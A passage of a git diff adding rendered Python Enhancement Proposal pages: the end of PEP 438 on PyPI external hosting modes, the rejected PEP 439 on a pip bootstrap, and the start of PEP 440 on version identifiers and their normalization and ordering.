  • pypi-explicit: for a package in this mode, only links to release +files uploaded to PyPI, and external links to release files +explicitly nominated by the package owner, will be added to the +simple/ index. PyPI will provide a new interface for package +owners to supply external release-file URLs. These URLs MUST include +a URL fragment in the form “#hashtype=hashvalue” specifying a hash +of the externally-linked file which installer tools MUST use to +validate that they have downloaded the intended file.
  • +
+

Thus the hope is that eventually all projects on PyPI can be migrated +to the pypi-explicit mode, while preserving the ability to install +release files hosted externally via installer tools. Deprecation of +hosting modes to eventually only allow the pypi-explicit mode is +NOT REGULATED by this PEP but is expected to become feasible some time +after successful implementation of the transition phases described in +this PEP. It is expected that deprecation requires a new process to +deal with abandoned packages because of unreachable maintainers for +still popular packages.

+
+
+

First transition phase (PyPI)

+

The proposed solution consists of multiple implementation and +communication steps:

+
    +
  1. Implement in PyPI the three modes described above, with an +interface for package owners to select the mode for each package +and register explicit external file URLs.
  2. +
  3. For packages in all modes, label links in the simple/ index to +index-hosted files with rel="internal", to make it easier for +client tools to distinguish these links in the second phase.
  4. +
  5. Add an HTML tag <meta name="api-version" value="2"> to all +simple/ index pages, to allow clients to distinguish between +indexes providing the rel="internal" metadata and older ones +that do not.
  6. +
  7. Default all newly-registered packages to pypi-explicit mode +(package owners can still switch to the other modes as desired).
  8. +
  9. Determine (via automated analysis [2]) which packages have all +installable files available on PyPI itself (group A), which have +all installable files on PyPI or linked directly from PyPI metadata +(group B), and which have installable versions available that are +linked only from external homepage/download HTML pages (group C).
  10. +
  11. Send mail to maintainers of projects in group A that their project +will be automatically configured to pypi-explicit mode in one +month, and similarly to maintainers of projects in group B that +their project will be automatically configured to pypi-scrape +mode. Inform them that this change is not expected to affect +installability of their project at all, but will result in faster +and safer installs for their users. Encourage them to set this +mode themselves sooner to benefit their users.
  12. +
  13. Send mail to maintainers of packages in group C that their package +hosting mode is pypi-scrape-crawl, list the URLs which +currently are crawled, and suggest that they either re-host their +packages directly on PyPI and switch to pypi-explicit, or at +least provide direct links to release files in PyPI metadata and +switch to pypi-scrape. Provide instructions and tools to help +with these transitions.
  14. +
+
+
+

Second transition phase (installer tools)

+

For the second transition phase, maintainers of installation tools are +asked to release two updates.

+

The first update shall provide clear warnings if externally-hosted +release files (that is, files whose link does not include +rel="internal") are selected for download, for which projects and +URLs exactly this happens, and warn that in future versions +externally-hosted downloads will be disabled by default.

+

The second update should change the default mode to allow only +installation of rel="internal" package files, and allow +installation of externally-hosted packages only when the user supplies +an option.

+

The installer should distinguish between verifiable and non-verifiable +external links. A verifiable external link is a direct link to an +installable file from the PyPI simple/ index that includes a hash +in the URL fragment (“#hashtype=hashvalue”) which can be used to +verify the integrity of the downloaded file. A non-verifiable external +link is any link (other than those explicitly supplied by the user of +an installer tool) without a hash, scraped from external HTML, or +injected into the search via some other non-PyPI source +(e.g. setuptools’ dependency_links feature).

+

Installers should provide a blanket option to allow +installing any verifiable external link. Non-verifiable external links +should only be installed if the user-provided option specifies exactly +which external domains can be used or for which specific package names +external links can be used.

+

When download of an externally-hosted package is disallowed by the +default configuration, the user should be notified, with instructions +for how to make the install succeed and warnings about the implication +(that a file will be downloaded from a site that is not part of the +package index). The warning given for non-verifiable links should +clearly state that the installer cannot verify the integrity of the +downloaded file. The warning given for verifiable external links +should simply note that the file will be downloaded from an external +URL, but that the file integrity can be verified by checksum.

+

Alternative PyPI-compatible index implementations should upgrade to +begin providing the rel="internal" metadata and the <meta +name="api-version" value="2"> tag as soon as possible. For +alternative indexes which do not yet provide the meta tag in their +simple/ pages, installation tools should provide +backwards-compatible fallback behavior (treat links as internal as in +pre-PEP times and provide a warning).

+
+
+

API For Submitting External Distribution URLs

+

New distribution URLs may be submitted by performing a HTTP POST to +the URL:

+
+
+

With the following form-encoded data:

+ + + + + + + + + + + + + + + + + + + + + +
NameValue
:actionThe string “urls”
nameThe package name as a string
versionThe release version as a string
new-urlThe new URL to store
submit_new_urlThe string “yes”
+

The POST must be accompanied by an HTTP Basic Auth header encoding the +username and password of the user authorized to maintain the package +on PyPI.

+

The HTTP response to this request will be one of:

+ + + + + + + + + + + + + + + + + + + + + + + +
CodeMeaningURL submission implications
200OKEverything worked just fine
400Bad requestData provided for submission was malformed
401UnauthorisedThe username or password supplied were incorrect
403ForbiddenUser does not have permission to update the +package information (not Owner or Maintainer)
+
+
+
+

References

+ +
+
+

Acknowledgments

+

Phillip Eby for precise information and the basic ideas to implement +the transition via server-side changes only.

+

Donald Stufft for pushing away from external hosting and offering to +implement both a Pull Request for the necessary PyPI changes and the +analysis tool to drive the transition phase 1.

+

Marc-Andre Lemburg, Alyssa Coghlan and catalog-sig in general for +thinking through issues regarding getting rid of “external hosting”.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0438.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0439/index.html b/pep-0439/index.html new file mode 100644 index 00000000000..e814bf199cb --- /dev/null +++ b/pep-0439/index.html @@ -0,0 +1,348 @@ + + + + + + + + PEP 439 – Inclusion of implicit pip bootstrap in Python installation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 439 – Inclusion of implicit pip bootstrap in Python installation

+
+
Author:
+
Richard Jones <richard at python.org>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
18-Mar-2013
+
Python-Version:
+
3.4
+
Post-History:
+
19-Mar-2013
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the inclusion of a pip bootstrap executable in the +Python installation to simplify the use of 3rd-party modules by Python +users.

+

This PEP does not propose to include the pip implementation in the +Python standard library. Nor does it propose to implement any package +management or installation mechanisms beyond those provided by PEP +427 (“The Wheel Binary Package Format 1.0”) and TODO distlib PEP.

+
+
+

PEP Rejection

+

This PEP has been rejected in favour of a more explicit mechanism that +should achieve the same end result in a more reliable fashion. The more +explicit bootstrapping mechanism is described in PEP 453.

+
+
+

Rationale

+

Currently the user story for installing 3rd-party Python modules is +not as simple as it could be. It requires that all 3rd-party modules +inform the user of how to install the installer, typically via a link +to the installer. That link may be out of date or the steps required +to perform the install of the installer may be enough of a roadblock +to prevent the user from further progress.

+

Large Python projects which emphasise a low barrier to entry have +shied away from depending on third party packages because of the +introduction of this potential stumbling block for new users.

+

With the inclusion of the package installer command in the standard +Python installation the barrier to installing additional software is +considerably reduced. It is hoped that this will therefore increase +the likelihood that Python projects will reuse third party software.

+

The Python community also has an issue of complexity around the current +bootstrap procedure for pip and setuptools. They all have +their own bootstrap download file with slightly different usages and +even refer to each other in some cases. Having a single bootstrap which +is common amongst them all, with a simple usage, would be far preferable.

+

It is also hoped that this is reduces the number of proposals to +include more and more software in the Python standard library, and +therefore that more popular Python software is more easily upgradeable +beyond requiring Python installation upgrades.

+
+
+

Proposal

+

The bootstrap will install the pip implementation, setuptools by downloading +their installation files from PyPI.

+

This proposal affects two components of packaging: the pip bootstrap and, +thanks to easier package installation, modifications to publishing +packages.

+

The core of this proposal is that the user experience of using pip should not +require the user to install pip.

+
+

The pip bootstrap

+

The Python installation includes an executable called “pip3” (see PEP 394 for +naming rationale etc.) that attempts to import pip machinery. If it can then +the pip command proceeds as normal. If it cannot it will bootstrap pip by +downloading the pip implementation and setuptools wheel files. Hereafter the +installation of the “pip implementation” will imply installation of setuptools +and virtualenv. Once installed, the pip command proceeds as normal. Once the +bootstrap process is complete the “pip3” command is no longer the bootstrap +but rather the full pip command.

+

A bootstrap is used in the place of a the full pip code so that we don’t have +to bundle pip and also pip is upgradeable outside of the regular Python +upgrade timeframe and processes.

+

To avoid issues with sudo we will have the bootstrap default to +installing the pip implementation to the per-user site-packages +directory defined in PEP 370 and implemented in Python 2.6/3.0. Since +we avoid installing to the system Python we also avoid conflicting +with any other packaging system (on Linux systems, for example.) If +the user is inside a PEP 405 virtual environment then the pip +implementation will be installed into that virtual environment.

+

The bootstrap process will proceed as follows:

+
    +
  1. The user system has Python (3.4+) installed. In the “scripts” +directory of the Python installation there is the bootstrap script +called “pip3”.
  2. +
  3. The user will invoke a pip command, typically “pip3 install +<package>”, for example “pip3 install Django”.
  4. +
  5. The bootstrap script will attempt to import the pip implementation. +If this succeeds, the pip command is processed normally. Stop.
  6. +
  7. On failing to import the pip implementation the bootstrap notifies +the user that it needs to “install pip”. It will ask the user whether it +should install pip as a system-wide site-packages or as a user-only +package. This choice will also be present as a command-line option to pip +so non-interactive use is possible.
  8. +
  9. The bootstrap will and contact PyPI to obtain the latest download wheel +file (see PEP 427.)
  10. +
  11. Upon downloading the file it is installed using “python setup.py install”.
  12. +
  13. The pip tool may now import the pip implementation and continues to +process the requested user command normally.
  14. +
+

Users may be running in an environment which cannot access the public +Internet and are relying solely on a local package repository. They +would use the “-i” (Base URL of Python Package Index) argument to the +“pip3 install” command. This simply overrides the default index URL pointing +to PyPI.

+

Some users may have no Internet access suitable for fetching the pip +implementation file. These users can manually download and install the +setuptools and pip tar files. Adding specific support for this use-case is +unnecessary.

+

The download of the pip implementation install file will be performed +securely. The transport from pypi.python.org will be done over HTTPS with the +CA certificate check performed. This facility will be present in Python 3.4+ +using Operating System certificates (see PEP XXXX).

+

Beyond those arguments controlling index location and download +options, the “pip3” bootstrap command may support further standard pip +options for verbosity, quietness and logging.

+

The “pip3” command will support two new command-line options that are used +in the bootstrapping, and otherwise ignored. They control where the pip +implementation is installed:

+
+
--bootstrap
Install to the user’s packages directory. The name of this option is chosen +to promote it as the preferred installation option.
+
--bootstrap-to-system
Install to the system site-packages directory.
+
+

These command-line options will also need to be implemented, but otherwise +ignored, in the pip implementation.

+

Consideration should be given to defaulting pip to install packages to the +user’s packages directory if pip is installed in that location.

+

The “–no-install” option to the “pip3” command will not affect the +bootstrapping process.

+
+
+

Modifications to publishing packages

+

An additional new Python package is proposed, “pypublish”, which +will be a tool for publishing packages to PyPI. It would replace the +current “python setup.py register” and “python setup.py upload” +distutils commands. Again because of the measured Python release +cycle and extensive existing Python installations these commands are +difficult to bugfix and extend. Additionally it is desired that the +“register” and “upload” commands be able to be performed over HTTPS +with certificate validation. Since shipping CA certificate keychains +with Python is not really feasible (updating the keychain is quite +difficult to manage) it is desirable that those commands, and the +accompanying keychain, be made installable and upgradeable outside of +Python itself.

+

The existing distutils mechanisms for package registration and upload would +remain, though with a deprecation warning.

+
+
+
+

Implementation

+

The changes to pip required by this PEP are being tracked in that project’s +issue tracker [2]. Most notably, the addition of –bootstrap and +–bootstrap-to-system to the pip command-line.

+

It would be preferable that the pip and setuptools projects distribute a wheel +format download.

+

The required code for this implementation is the “pip3” command described +above. The additional pypublish can be developed outside of the scope of this +PEP’s work.

+

Finally, it would be desirable that “pip3” be ported to Python 2.6+ to allow +the single command to replace existing pip, setuptools and virtualenv (which +would be added to the bootstrap) bootstrap scripts. Having that bootstrap +included in a future Python 2.7 release would also be highly desirable.

+
+
+

Risks

+

The key that is used to sign the pip implementation download might be +compromised and this PEP currently proposes no mechanism for key +revocation.

+

There is a Perl package installer also named “pip”. It is quite rare and not +commonly used. The Fedora variant of Linux has historically named Python’s +“pip” as “python-pip” and Perl’s “pip” as “perl-pip”. This policy has been +altered[3] so that future and upgraded Fedora installations will use the name +“pip” for Python’s “pip”. Existing (non-upgraded) installations will still +have the old name for the Python “pip”, though the potential for confusion is +now much reduced.

+
+
+

References

+ +
+
+

Acknowledgments

+

Alyssa Coghlan for her thoughts on the proposal and dealing with the Red +Hat issue.

+

Jannis Leidel and Carl Meyer for their thoughts. Marcus Smith for feedback.

+

Marcela Mašláňová for resolving the Fedora issue.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0439.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0440/index.html b/pep-0440/index.html new file mode 100644 index 00000000000..7e4e41530c2 --- /dev/null +++ b/pep-0440/index.html @@ -0,0 +1,1674 @@ + + + + + + + + PEP 440 – Version Identification and Dependency Specification | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 440 – Version Identification and Dependency Specification

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, +Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
18-Mar-2013
+
Post-History:
+
30-Mar-2013, 27-May-2013, 20-Jun-2013, +21-Dec-2013, 28-Jan-2014, 08-Aug-2014, +22-Aug-2014
+
Replaces:
+
386
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Version specifiers, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP describes a scheme for identifying versions of Python software +distributions, and declaring dependencies on particular versions.

+

This document addresses several limitations of the previous attempt at a +standardized approach to versioning, as described in PEP 345 and PEP 386.

+
+
+

Definitions

+

The key words “MUST”, “MUST NOT”, “REQUIRED”, “SHALL”, “SHALL NOT”, +“SHOULD”, “SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” in this +document are to be interpreted as described in RFC 2119.

+

“Projects” are software components that are made available for integration. +Projects include Python libraries, frameworks, scripts, plugins, +applications, collections of data or other resources, and various +combinations thereof. Public Python projects are typically registered on +the Python Package Index.

+

“Releases” are uniquely identified snapshots of a project.

+

“Distributions” are the packaged files which are used to publish +and distribute a release.

+

“Build tools” are automated tools intended to run on development systems, +producing source and binary distribution archives. Build tools may also be +invoked by integration tools in order to build software distributed as +sdists rather than prebuilt binary archives.

+

“Index servers” are active distribution registries which publish version and +dependency metadata and place constraints on the permitted metadata.

+

“Publication tools” are automated tools intended to run on development +systems and upload source and binary distribution archives to index servers.

+

“Installation tools” are integration tools specifically intended to run on +deployment targets, consuming source and binary distribution archives from +an index server or other designated location and deploying them to the target +system.

+

“Automated tools” is a collective term covering build tools, index servers, +publication tools, integration tools and any other software that produces +or consumes distribution version and dependency metadata.

+
+
+

Version scheme

+

Distributions are identified by a public version identifier which +supports all defined version comparison operations

+

The version scheme is used both to describe the distribution version +provided by a particular distribution archive, as well as to place +constraints on the version of dependencies needed in order to build or +run the software.

+
+

Public version identifiers

+

The canonical public version identifiers MUST comply with the following +scheme:

+
[N!]N(.N)*[{a|b|rc}N][.postN][.devN]
+
+
+

Public version identifiers MUST NOT include leading or trailing whitespace.

+

Public version identifiers MUST be unique within a given distribution.

+

Installation tools SHOULD ignore any public versions which do not comply with +this scheme but MUST also include the normalizations specified below. +Installation tools MAY warn the user when non-compliant or ambiguous versions +are detected.

+

See also Appendix B : Parsing version strings with regular expressions +which provides a regular expression to check strict conformance with the +canonical format, as well as a more permissive regular expression accepting +inputs that may require subsequent normalization.

+

Public version identifiers are separated into up to five segments:

+
    +
  • Epoch segment: N!
  • +
  • Release segment: N(.N)*
  • +
  • Pre-release segment: {a|b|rc}N
  • +
  • Post-release segment: .postN
  • +
  • Development release segment: .devN
  • +
+

Any given release will be a “final release”, “pre-release”, “post-release” or +“developmental release” as defined in the following sections.

+

All numeric components MUST be non-negative integers represented as sequences +of ASCII digits.

+

All numeric components MUST be interpreted and ordered according to their +numeric value, not as text strings.

+

All numeric components MAY be zero. Except as described below for the +release segment, a numeric component of zero has no special significance +aside from always being the lowest possible value in the version ordering.

+
+

Note

+

Some hard to read version identifiers are permitted by this scheme in +order to better accommodate the wide range of versioning practices +across existing public and private Python projects.

+

Accordingly, some of the versioning practices which are technically +permitted by the PEP are strongly discouraged for new projects. Where +this is the case, the relevant details are noted in the following +sections.

+
+
+
+

Local version identifiers

+

Local version identifiers MUST comply with the following scheme:

+
<public version identifier>[+<local version label>]
+
+
+

They consist of a normal public version identifier (as defined in the +previous section), along with an arbitrary “local version label”, separated +from the public version identifier by a plus. Local version labels have +no specific semantics assigned, but some syntactic restrictions are imposed.

+

Local version identifiers are used to denote fully API (and, if applicable, +ABI) compatible patched versions of upstream projects. For example, these +may be created by application developers and system integrators by applying +specific backported bug fixes when upgrading to a new upstream release would +be too disruptive to the application or other integrated system (such as a +Linux distribution).

+

The inclusion of the local version label makes it possible to differentiate +upstream releases from potentially altered rebuilds by downstream +integrators. The use of a local version identifier does not affect the kind +of a release but, when applied to a source distribution, does indicate that +it may not contain the exact same code as the corresponding upstream release.

+

To ensure local version identifiers can be readily incorporated as part of +filenames and URLs, and to avoid formatting inconsistencies in hexadecimal +hash representations, local version labels MUST be limited to the following +set of permitted characters:

+
    +
  • ASCII letters ([a-zA-Z])
  • +
  • ASCII digits ([0-9])
  • +
  • periods (.)
  • +
+

Local version labels MUST start and end with an ASCII letter or digit.

+

Comparison and ordering of local versions considers each segment of the local +version (divided by a .) separately. If a segment consists entirely of +ASCII digits then that section should be considered an integer for comparison +purposes and if a segment contains any ASCII letters then that segment is +compared lexicographically with case insensitivity. When comparing a numeric +and lexicographic segment, the numeric section always compares as greater than +the lexicographic segment. Additionally a local version with a great number of +segments will always compare as greater than a local version with fewer +segments, as long as the shorter local version’s segments match the beginning +of the longer local version’s segments exactly.

+

An “upstream project” is a project that defines its own public versions. A +“downstream project” is one which tracks and redistributes an upstream project, +potentially backporting security and bug fixes from later versions of the +upstream project.

+

Local version identifiers SHOULD NOT be used when publishing upstream +projects to a public index server, but MAY be used to identify private +builds created directly from the project source. Local +version identifiers SHOULD be used by downstream projects when releasing a +version that is API compatible with the version of the upstream project +identified by the public version identifier, but contains additional changes +(such as bug fixes). As the Python Package Index is intended solely for +indexing and hosting upstream projects, it MUST NOT allow the use of local +version identifiers.

+

Source distributions using a local version identifier SHOULD provide the +python.integrator extension metadata (as defined in PEP 459).

+
+
+

Final releases

+

A version identifier that consists solely of a release segment and optionally +an epoch identifier is termed a “final release”.

+

The release segment consists of one or more non-negative integer +values, separated by dots:

+
N(.N)*
+
+
+

Final releases within a project MUST be numbered in a consistently +increasing fashion, otherwise automated tools will not be able to upgrade +them correctly.

+

Comparison and ordering of release segments considers the numeric value +of each component of the release segment in turn. When comparing release +segments with different numbers of components, the shorter segment is +padded out with additional zeros as necessary.

+

While any number of additional components after the first are permitted +under this scheme, the most common variants are to use two components +(“major.minor”) or three components (“major.minor.micro”).

+

For example:

+
0.9
+0.9.1
+0.9.2
+...
+0.9.10
+0.9.11
+1.0
+1.0.1
+1.1
+2.0
+2.0.1
+...
+
+
+

A release series is any set of final release numbers that start with a +common prefix. For example, 3.3.1, 3.3.5 and 3.3.9.45 are all +part of the 3.3 release series.

+
+

Note

+

X.Y and X.Y.0 are not considered distinct release numbers, as +the release segment comparison rules implicit expand the two component +form to X.Y.0 when comparing it to any release segment that includes +three components.

+
+

Date based release segments are also permitted. An example of a date based +release scheme using the year and month of the release:

+
2012.4
+2012.7
+2012.10
+2013.1
+2013.6
+...
+
+
+
+
+

Pre-releases

+

Some projects use an “alpha, beta, release candidate” pre-release cycle to +support testing by their users prior to a final release.

+

If used as part of a project’s development cycle, these pre-releases are +indicated by including a pre-release segment in the version identifier:

+
X.YaN   # Alpha release
+X.YbN   # Beta release
+X.YrcN  # Release Candidate
+X.Y     # Final release
+
+
+

A version identifier that consists solely of a release segment and a +pre-release segment is termed a “pre-release”.

+

The pre-release segment consists of an alphabetical identifier for the +pre-release phase, along with a non-negative integer value. Pre-releases for +a given release are ordered first by phase (alpha, beta, release candidate) +and then by the numerical component within that phase.

+

Installation tools MAY accept both c and rc releases for a common +release segment in order to handle some existing legacy distributions.

+

Installation tools SHOULD interpret c versions as being equivalent to +rc versions (that is, c1 indicates the same version as rc1).

+

Build tools, publication tools and index servers SHOULD disallow the creation +of both rc and c releases for a common release segment.

+
+
+

Post-releases

+

Some projects use post-releases to address minor errors in a final release +that do not affect the distributed software (for example, correcting an error +in the release notes).

+

If used as part of a project’s development cycle, these post-releases are +indicated by including a post-release segment in the version identifier:

+
X.Y.postN    # Post-release
+
+
+

A version identifier that includes a post-release segment without a +developmental release segment is termed a “post-release”.

+

The post-release segment consists of the string .post, followed by a +non-negative integer value. Post-releases are ordered by their +numerical component, immediately following the corresponding release, +and ahead of any subsequent release.

+
+

Note

+

The use of post-releases to publish maintenance releases containing +actual bug fixes is strongly discouraged. In general, it is better +to use a longer release number and increment the final component +for each maintenance release.

+
+

Post-releases are also permitted for pre-releases:

+
X.YaN.postM   # Post-release of an alpha release
+X.YbN.postM   # Post-release of a beta release
+X.YrcN.postM  # Post-release of a release candidate
+
+
+
+

Note

+

Creating post-releases of pre-releases is strongly discouraged, as +it makes the version identifier difficult to parse for human readers. +In general, it is substantially clearer to simply create a new +pre-release by incrementing the numeric component.

+
+
+
+

Developmental releases

+

Some projects make regular developmental releases, and system packagers +(especially for Linux distributions) may wish to create early releases +directly from source control which do not conflict with later project +releases.

+

If used as part of a project’s development cycle, these developmental +releases are indicated by including a developmental release segment in the +version identifier:

+
X.Y.devN    # Developmental release
+
+
+

A version identifier that includes a developmental release segment is +termed a “developmental release”.

+

The developmental release segment consists of the string .dev, +followed by a non-negative integer value. Developmental releases are ordered +by their numerical component, immediately before the corresponding release +(and before any pre-releases with the same release segment), and following +any previous release (including any post-releases).

+

Developmental releases are also permitted for pre-releases and +post-releases:

+
X.YaN.devM       # Developmental release of an alpha release
+X.YbN.devM       # Developmental release of a beta release
+X.YrcN.devM      # Developmental release of a release candidate
+X.Y.postN.devM   # Developmental release of a post-release
+
+
+
+

Note

+

While they may be useful for continuous integration purposes, publishing +developmental releases of pre-releases to general purpose public index +servers is strongly discouraged, as it makes the version identifier +difficult to parse for human readers. If such a release needs to be +published, it is substantially clearer to instead create a new +pre-release by incrementing the numeric component.

+

Developmental releases of post-releases are also strongly discouraged, +but they may be appropriate for projects which use the post-release +notation for full maintenance releases which may include code changes.

+
+
+
+

Version epochs

+

If included in a version identifier, the epoch appears before all other +components, separated from the release segment by an exclamation mark:

+
E!X.Y  # Version identifier with epoch
+
+
+

If no explicit epoch is given, the implicit epoch is 0.

+

Most version identifiers will not include an epoch, as an explicit epoch is +only needed if a project changes the way it handles version numbering in +a way that means the normal version ordering rules will give the wrong +answer. For example, if a project is using date based versions like +2014.04 and would like to switch to semantic versions like 1.0, then +the new releases would be identified as older than the date based releases +when using the normal sorting scheme:

+
1.0
+1.1
+2.0
+2013.10
+2014.04
+
+
+

However, by specifying an explicit epoch, the sort order can be changed +appropriately, as all versions from a later epoch are sorted after versions +from an earlier epoch:

+
2013.10
+2014.04
+1!1.0
+1!1.1
+1!2.0
+
+
+
+
+

Normalization

+

In order to maintain better compatibility with existing versions there are a +number of “alternative” syntaxes that MUST be taken into account when parsing +versions. These syntaxes MUST be considered when parsing a version, however +they should be “normalized” to the standard syntax defined above.

+
+

Case sensitivity

+

All ascii letters should be interpreted case insensitively within a version and +the normal form is lowercase. This allows versions such as 1.1RC1 which +would be normalized to 1.1rc1.

+
+
+

Integer Normalization

+

All integers are interpreted via the int() built in and normalize to the +string form of the output. This means that an integer version of 00 would +normalize to 0 while 09000 would normalize to 9000. This does not +hold true for integers inside of an alphanumeric segment of a local version +such as 1.0+foo0100 which is already in its normalized form.

+
+
+

Pre-release separators

+

Pre-releases should allow a ., -, or _ separator between the +release segment and the pre-release segment. The normal form for this is +without a separator. This allows versions such as 1.1.a1 or 1.1-a1 +which would be normalized to 1.1a1. It should also allow a separator to +be used between the pre-release signifier and the numeral. This allows versions +such as 1.0a.1 which would be normalized to 1.0a1.

+
+
+

Pre-release spelling

+

Pre-releases allow the additional spellings of alpha, beta, c, +pre, and preview for a, b, rc, rc, and rc +respectively. This allows versions such as 1.1alpha1, 1.1beta2, or +1.1c3 which normalize to 1.1a1, 1.1b2, and 1.1rc3. In every +case the additional spelling should be considered equivalent to their normal +forms.

+
+
+

Implicit pre-release number

+

Pre releases allow omitting the numeral in which case it is implicitly assumed +to be 0. The normal form for this is to include the 0 explicitly. This +allows versions such as 1.2a which is normalized to 1.2a0.

+
+
+

Post release separators

+

Post releases allow a ., -, or _ separator as well as omitting the +separator all together. The normal form of this is with the . separator. +This allows versions such as 1.2-post2 or 1.2post2 which normalize to +1.2.post2. Like the pre-release separator this also allows an optional +separator between the post release signifier and the numeral. This allows +versions like 1.2.post-2 which would normalize to 1.2.post2.

+
+
+

Post release spelling

+

Post-releases allow the additional spellings of rev and r. This allows +versions such as 1.0-r4 which normalizes to 1.0.post4. As with the +pre-releases the additional spellings should be considered equivalent to their +normal forms.

+
+
+

Implicit post release number

+

Post releases allow omitting the numeral in which case it is implicitly assumed +to be 0. The normal form for this is to include the 0 explicitly. This +allows versions such as 1.2.post which is normalized to 1.2.post0.

+
+
+

Implicit post releases

+

Post releases allow omitting the post signifier all together. When using +this form the separator MUST be - and no other form is allowed. This allows +versions such as 1.0-1 to be normalized to 1.0.post1. This particular +normalization MUST NOT be used in conjunction with the implicit post release +number rule. In other words, 1.0- is not a valid version and it does not +normalize to 1.0.post0.

+
+
+

Development release separators

+

Development releases allow a ., -, or a _ separator as well as +omitting the separator all together. The normal form of this is with the . +separator. This allows versions such as 1.2-dev2 or 1.2dev2 which +normalize to 1.2.dev2.

+
+
+

Implicit development release number

+

Development releases allow omitting the numeral in which case it is implicitly +assumed to be 0. The normal form for this is to include the 0 +explicitly. This allows versions such as 1.2.dev which is normalized to +1.2.dev0.

+
+
+

Local version segments

+

With a local version, in addition to the use of . as a separator of +segments, the use of - and _ is also acceptable. The normal form is +using the . character. This allows versions such as 1.0+ubuntu-1 to be +normalized to 1.0+ubuntu.1.

+
+
+

Preceding v character

+

In order to support the common version notation of v1.0 versions may be +preceded by a single literal v character. This character MUST be ignored +for all purposes and should be omitted from all normalized forms of the +version. The same version with and without the v is considered equivalent.

+
+
+

Leading and Trailing Whitespace

+

Leading and trailing whitespace must be silently ignored and removed from all +normalized forms of a version. This includes " ", \t, \n, \r, +\f, and \v. This allows accidental whitespace to be handled sensibly, +such as a version like 1.0\n which normalizes to 1.0.

+
+
+
+

Examples of compliant version schemes

+

The standard version scheme is designed to encompass a wide range of +identification practices across public and private Python projects. In +practice, a single project attempting to use the full flexibility offered +by the scheme would create a situation where human users had difficulty +figuring out the relative order of versions, even though the rules above +ensure all compliant tools will order them consistently.

+

The following examples illustrate a small selection of the different +approaches projects may choose to identify their releases, while still +ensuring that the “latest release” and the “latest stable release” can +be easily determined, both by human users and automated tools.

+

Simple “major.minor” versioning:

+
0.1
+0.2
+0.3
+1.0
+1.1
+...
+
+
+

Simple “major.minor.micro” versioning:

+
1.1.0
+1.1.1
+1.1.2
+1.2.0
+...
+
+
+

“major.minor” versioning with alpha, beta and candidate +pre-releases:

+
0.9
+1.0a1
+1.0a2
+1.0b1
+1.0rc1
+1.0
+1.1a1
+...
+
+
+

“major.minor” versioning with developmental releases, release candidates +and post-releases for minor corrections:

+
0.9
+1.0.dev1
+1.0.dev2
+1.0.dev3
+1.0.dev4
+1.0c1
+1.0c2
+1.0
+1.0.post1
+1.1.dev1
+...
+
+
+

Date based releases, using an incrementing serial within each year, skipping +zero:

+
2012.1
+2012.2
+2012.3
+...
+2012.15
+2013.1
+2013.2
+...
+
+
+
+
+

Summary of permitted suffixes and relative ordering

+
+

Note

+

This section is intended primarily for authors of tools that +automatically process distribution metadata, rather than developers +of Python distributions deciding on a versioning scheme.

+
+

The epoch segment of version identifiers MUST be sorted according to the +numeric value of the given epoch. If no epoch segment is present, the +implicit numeric value is 0.

+

The release segment of version identifiers MUST be sorted in +the same order as Python’s tuple sorting when the normalized release segment is +parsed as follows:

+
tuple(map(int, release_segment.split(".")))
+
+
+

All release segments involved in the comparison MUST be converted to a +consistent length by padding shorter segments with zeros as needed.

+

Within a numeric release (1.0, 2.7.3), the following suffixes +are permitted and MUST be ordered as shown:

+
.devN, aN, bN, rcN, <no suffix>, .postN
+
+
+

Note that c is considered to be semantically equivalent to rc and must +be sorted as if it were rc. Tools MAY reject the case of having the same +N for both a c and a rc in the same release segment as ambiguous +and remain in compliance with the PEP.

+

Within an alpha (1.0a1), beta (1.0b1), or release candidate +(1.0rc1, 1.0c1), the following suffixes are permitted and MUST be +ordered as shown:

+
.devN, <no suffix>, .postN
+
+
+

Within a post-release (1.0.post1), the following suffixes are permitted +and MUST be ordered as shown:

+
.devN, <no suffix>
+
+
+

Note that devN and postN MUST always be preceded by a dot, even +when used immediately following a numeric version (e.g. 1.0.dev456, +1.0.post1).

+

Within a pre-release, post-release or development release segment with a +shared prefix, ordering MUST be by the value of the numeric component.

+

The following example covers many of the possible combinations:

+
1.dev0
+1.0.dev456
+1.0a1
+1.0a2.dev456
+1.0a12.dev456
+1.0a12
+1.0b1.dev456
+1.0b2
+1.0b2.post345.dev456
+1.0b2.post345
+1.0rc1.dev456
+1.0rc1
+1.0
+1.0+abc.5
+1.0+abc.7
+1.0+5
+1.0.post456.dev34
+1.0.post456
+1.0.15
+1.1.dev1
+
+
+
+
+

Version ordering across different metadata versions

+

Metadata v1.0 (PEP 241) and metadata v1.1 (PEP 314) do not specify a standard +version identification or ordering scheme. However metadata v1.2 (PEP 345) +does specify a scheme which is defined in PEP 386.

+

